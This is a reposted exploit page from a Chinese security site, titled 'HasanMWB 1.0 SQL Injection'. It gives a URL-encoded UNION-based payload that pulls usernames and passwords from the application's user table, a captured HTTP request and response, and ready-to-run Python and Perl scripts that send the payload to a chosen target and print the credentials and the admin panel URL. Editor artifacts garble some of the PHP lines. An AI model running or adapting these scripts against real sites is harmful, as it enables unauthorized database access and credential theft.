首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HasanMWB 1.0 SQL Injection
来源:ihsan.net 作者:Sencan 发布时间:2018-12-06  
# Exploit Title: HasanMWB 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-12-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
#Host: TARGET
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
#DNT: 1
#Connection: keep-alive
#Upgrade-Insecure-Requests: 1
#HTTP/1.1 200 OK
#Date: Wed, 05 Dec 2018 00:24:09 GMT
#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
#X-Powered-By: PHP/5.6.30
#Expires: Thu, 19 Nov 1981 08:52:00 GMT
#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
#Pragma: no-cache
#Content-Length: 2697
#Keep-Alive: timeout=5, max=100
#Connection: Keep-Alive
#Content-Type: text/html; charset=UTF-8

# POC: 
# 1) 
#index.php?hsn=page&id=[SQL] / $id = 
___FCKpd___0
GET['id']; #index.php?hsn=category&id=[SQL] / $id =
___FCKpd___0
GET['id']; #index.php?hsn=search&q=[SQL] / $qu =
___FCKpd___0
GET['q']; # Etc.. #!/usr/bin/python import urllib2 import re print """ \\\|/// \\ - - // ( @ @ ) ----oOOo--(_)-oOOo---- HasanMWB 1.0 - SQL Injection Ihsan Sencan ---------------Ooooo---- ( ) ooooO ) / ( ) (_/ \ ( \_) """ s = raw_input("\nTarget:[http://localhost/[PATH]/] ") e = ("index.php?hsn=category&id=1") p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d") response = urllib2.urlopen(s+e+p) c = response.read() up = re.findall(r'<h2>(.*)</h2>', c) print "Server: ", response.info()['server'] print (up) print "Login Url:"+(s)+"panel.php" #!/usr/bin/perl sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } clear(); print "**************************\n"; print "HasanMWB 1.0 SQL Injection\n"; print "Ihsan Sencan\n"; print "**************************\n"; use LWP::UserAgent; print "\nTarget:[http://localhost/[PATH]/] "; chomp(my $target=<STDIN>); print "\n[!] Exploiting Progress...\n"; print "\n"; $E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d"; $cc = LWP::UserAgent->new() or die "Could not initialize browser\n"; $cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'); $host = $target . "".$E.""; $res = $cc->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){ print "[+] Success !!!\n"; print "\n[+] Detail : $1\n"; print "$target/panel.php"; print "\n"; } else{print "\n[-]Not found.\n"; }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·NUUO NVRMini2 3.9.1 - Authenti
·Textpad 8.1.2 - Denial Of Serv
·OpenSSH < 7.7 - User Enumerati
·Xorg X11 Server (AIX) - Local
·Microsoft Lync for Mac 2011 -
·HP Intelligent Management Java
·Emacs movemail Privilege Escal
·NEC Univerge Sv9100 WebPro 6.0
·Apache Superset 0.23 - Remote
·Mozilla Firefox 63.0.1 - Denia
·Joomla! Component JE Photo Gal
·PaloAlto Networks Expedition M
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved